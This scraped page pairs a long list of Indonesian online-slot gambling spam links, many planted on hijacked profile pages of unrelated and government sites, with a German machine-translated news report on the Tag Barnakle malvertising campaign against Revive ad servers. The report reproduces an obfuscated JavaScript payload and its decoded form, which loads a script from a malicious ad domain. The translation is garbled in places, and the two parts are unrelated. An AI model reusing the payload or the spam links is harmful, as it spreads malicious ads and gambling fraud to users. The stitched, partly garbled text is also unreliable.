Slot Gacor https://www.clubelbruz.com/Comunidad/perfil/daftar-situs-slot-gacor-terbaru-2022/ https://www.clubelbruz.com/Comunidad/perfil/bocoran-slot-gacor-admin-slot-gampang-menang/ https://www.clubelbruz.com/Comunidad/perfil/slot-gacor-terpercaya-bonus-new-member/ https://www.clubelbruz.com/Comunidad/perfil/situs-judi-slot-online-gacor-2022/ https://www.clubelbruz.com/Comunidad/perfil/10-situs-judi-slot-online-terbaik-dan-terpercaya/ https://ruta99.gva.es/community/profile/link-situs-slot-online-gacor-2022/ https://ruta99.gva.es/community/profile/bocoran-slot-gacor-rtp-slot-tertinggi-hari-ini/ https://ruta99.gva.es/community/profile/situs-judi-slot-bonus-new-member-100-di-awal/ https://ruta99.gva.es/community/profile/10-situs-judi-slot-online-gacor-terbaik-2022/ https://ruta99.gva.es/community/profile/situs-judi-slot-online-gacor-jackpot-terbesar/ https://www.rozmah.in/profile/daftar-10-situs-judi-slot-online-terpercaya-no-1/profile https://www.philcoulter.com/profile/situs-judi-slot-online-jackpot-terbesar-2022/profile https://www.chefsgallery.com.au/profile/daftar-situs-judi-slot-online-gampang-menang-2022/profile https://www.eppa.com/profile/situs-judi-slot-online-gampang-menang-jp/profile https://www.wishboneandflynt.com/profile/kumpulan-judi-slot-gacor-gampang-menang/profile https://www.youth-impact.org/profile/daftar-10-situs-judi-slot-online-gampang-menang-terbaru/profile https://www.m3creative.net/profile/kumpulan-nama-nama-situs-judi-slot-online-paling-gacor-dan-terpercaya-2022/profile https://www.gtamultigames.com/profile/situs-judi-slot-online-jackpot-terbesar-2022/profile?lang=hi https://www.yuriageasaichi.jp/profile/daftar-nama-nama-10-situs-judi-slot-online-gacor-terbaik-2022/profile?lang=vi https://suphaset.info/question/daftar-situs-judi-slot-bonus-100-di-depan-new-member-baru-judi-slot-online-gacor-terbaru-hari-ini-2022-paling-gampang-menang-to-kecil/ https://www.extensionstudio.rs/profile/daftar-situs-judi-slot-gacor-gampang-menang-hari-ini-2022/profile https://www.thehenleyschoolofart.com/profile/situs-judi-slot-gacor-gampang-menang-hari-ini-2022/profile https://www.rozmah.in/profile/bocoran-situs-slot-gacor-hari-ini-gampang-jackpot/profile https://www.eminamclean.com/profile/daftar-situs-slot-gacor-terbaru-2022-terpercaya-gampang-menang/profile https://www.escoteirosrs.org.br/profile/daftar-link-situs-slot-online-gacor-2022-gampang-menang/profile https://www.finetaste.com.tw/profile/rekomendasi-situs-slot-online-gacor-winrate-tertinggi/profile https://www.andremehmari.com.br/profile/daftar-situs-judi-slot-bonus-100-di-depan/profile https://www.nejisaurus.engineer.jp/profile/bocoran-slot-gacor-admin-slot-gampang-menang-pragmatic-play/profile https://www.moralesfordistrict145.com/profile/situs-slot-bonus-new-member-100-150-200-di-awal-terbaru-2022/profile https://www.onephisigmasigma.org/profile/situs-slot-bonus-new-member-100-di-awal-bisa-beli-spin/profile https://www.gtamultigames.com/profile/bocoran-situs-slot-gacor-terbaru-pragmatic-play-hari-ini/profile?lang=en https://sns.gob.do/foro/perfil/situs-slot-gacor-gampang-menang-pragmatic-play/ https://sns.gob.do/foro/perfil/link-rtp-live-slot-gacor-2022/ https://sns.gob.do/foro/perfil/informasi-jadwal-bocoran-slot-gacor-hari-ini/ https://sns.gob.do/foro/perfil/judi-slot-terbaik-dan-terpercaya-no-1/ https://sns.gob.do/foro/perfil/situs-judi-slot-online-jackpot-2022/ https://animedrawn.com/forum/profile/bocoran-slot-gacor-hari-ini-terpercaya-2022/ https://animedrawn.com/forum/profile/bocoran-slot-gacor-hari-ini-terpercaya-2022/ https://animedrawn.com/forum/profile/slot-gacor-hari-ini-pragmatic-play-deposit-pulsa/ https://animedrawn.com/forum/profile/situs-judi-slot-terbaik-dan-terpercaya-no-1/ https://animedrawn.com/forum/profile/judi-slot-online-jackpot-terbesar/
Malvertising-Archiv ✔️ Nachrichten für Finanzen
Totenkopf mit gekreuzten Knochen im Binärcode

Hacker haben im vergangenen Jahr mehr als 120 Ad-Server in einer laufenden Kampagne kompromittiert, die bösartige Werbung auf Dutzenden, wenn nicht sogar Hunderten von Millionen Geräten anzeigt, wenn sie Websites besuchen, die nach außen hin harmlos sind.

Malvertising ist die Praxis, Personen beim Besuch vertrauenswürdiger Websites Anzeigen zu liefern. Die Anzeigen betten JavaScript ein, das heimlich Softwarefehler ausnutzt oder versucht, Besucher dazu zu verleiten, eine unsichere App zu installieren, betrügerische Computersupportgebühren zu zahlen oder andere schädliche Maßnahmen zu ergreifen. Normalerweise geben sich die Betrüger hinter dieser Internet-Geißel als Käufer aus und bezahlen Werbenetzwerke, um die bösartigen Anzeigen auf einzelnen Websites anzuzeigen.

Auf die Halsschlagader gehen

Um das Anzeigen-Ökosystem zu infiltrieren, indem man sich als legitimer Käufer ausgibt, sind Ressourcen erforderlich. Zum einen müssen Betrüger Zeit investieren, um zu lernen, wie der Markt funktioniert, und dann ein Unternehmen mit einem vertrauenswürdigen Ruf aufbauen. Der Ansatz erfordert auch, Geld zu bezahlen, um Speicherplatz für die Schaltung schädlicher Anzeigen zu kaufen. Das ist nicht die Technik, die von einer Malvertising-Gruppe verwendet wird, die die Sicherheitsfirma Confiant Tag Barnakle nennt.

„Tag Barnakle hingegen ist in der Lage, diese anfängliche Hürde vollständig zu umgehen, indem er direkt auf die Halsschlagader zugreift – eine Massenkompromittierung der Adserving-Infrastruktur“, schrieb die Confiant-Forscherin Eliya Stein in a . Blogbeitrag am Montag veröffentlicht. „Wahrscheinlich können sie auch einen ROI [Return on Investment] vorweisen, der ihre Konkurrenten in den Schatten stellen würde, da sie keinen Cent ausgeben müssen, um Werbekampagnen zu schalten.“

Im letzten Jahr hat Tag Barnakle mehr als 120 laufende Server infiziert Revive, eine Open-Source-App für Organisationen, die ihren eigenen Anzeigenserver betreiben möchten, anstatt sich auf einen Drittanbieterdienst zu verlassen. Die Zahl von 120 ist doppelt so hoch wie die Zahl der infizierten Revive-Server Confiant letztes Jahr gefunden.

Sobald es einen Ad-Server kompromittiert hat, lädt Tag Barnakle eine bösartige Nutzlast darauf. Um einer Erkennung zu entgehen, verwendet die Gruppe clientseitige Fingerabdrücke, um sicherzustellen, dass nur eine kleine Anzahl der attraktivsten Ziele die schädliche Werbung erhält. Die Server, die diesen Zielen eine sekundäre Nutzlast liefern, verwenden auch Cloaking-Techniken, um sicherzustellen, dass sie auch unter dem Radar fliegen.

Hier eine Übersicht:

Zuversichtlich

Als Confiant letztes Jahr über Tag Barnakle berichtete, stellte es fest, dass die Gruppe etwa 60 Revive-Server infiziert hatte. Das Kunststück ermöglichte es der Gruppe, Anzeigen auf mehr als 360 Web-Properties zu verteilen. Die Anzeigen haben gefälschte Adobe Flash-Updates verbreitet, die beim Ausführen installierter Malware auf Desktop-Computern ausgeführt werden.

Dieses Mal richtet sich Tag Barnakle sowohl an iPhone- als auch an Android-Nutzer. Websites, die eine Anzeige über einen kompromittierten Server erhalten, liefern stark verschleiertes JavaScript, das bestimmt, ob ein Besucher ein iPhone oder ein Android-Gerät verwendet.

https://galikos[.]com/ci.html?mAn8iynQtt=SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1

Für den Fall, dass Besucher diesen und andere Fingerabdrucktests bestehen, erhalten sie eine sekundäre Nutzlast, die wie folgt aussieht:

var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

Nach der Dekodierung ist die Nutzlast:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("text/javascript");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");

Wie der entschleierte Code zeigt, werden die Anzeigen über overgalladean[.]com geschaltet, eine Domain, von der Confiant sagte, dass sie von PropellerAds verwendet wird, einem Werbenetzwerk, das Sicherheitsfirmen wie Malwarebytes haben lange als bösartig dokumentiert.

Als Confiant den Klick-Tracker von Propeller Ads auf den Gerätetypen wiederholte, auf die Tag Barnakle ausgerichtet war, wurden Anzeigen wie diese angezeigt:

Zuversichtlich

Zig Millionen serviert

Die Anzeigen locken hauptsächlich Ziele zu einem App-Store-Eintrag für gefälschte Sicherheits-, Sicherheits- oder VPN-Apps mit versteckten Abonnementkosten oder „Verkehr ableiten für schändliche Zwecke“.

Da Adserver häufig in mehrere Anzeigenbörsen integriert sind, haben die Anzeigen das Potenzial, sich über Hunderte, möglicherweise Tausende von einzelnen Websites zu verbreiten. Confiant weiß nicht, wie viele Endbenutzer Malvertising ausgesetzt sind, aber das Unternehmen geht davon aus, dass die Zahl hoch ist.

„Wenn wir bedenken, dass einige dieser Medienunternehmen [Revive]-Integrationen mit führenden Plattformen für programmatische Werbung haben, liegt die Reichweite von Tag Barnakle bei mehreren Dutzend, wenn nicht sogar Hunderten von Millionen von Geräten“, schrieb Stein. "Dies ist eine konservative Schätzung, die die Tatsache berücksichtigt, dass sie ihre Opfer mit einem Cookies versehen, um die Nutzlast mit geringer Häufigkeit aufzudecken, was wahrscheinlich die Erkennung ihrer Anwesenheit verlangsamt."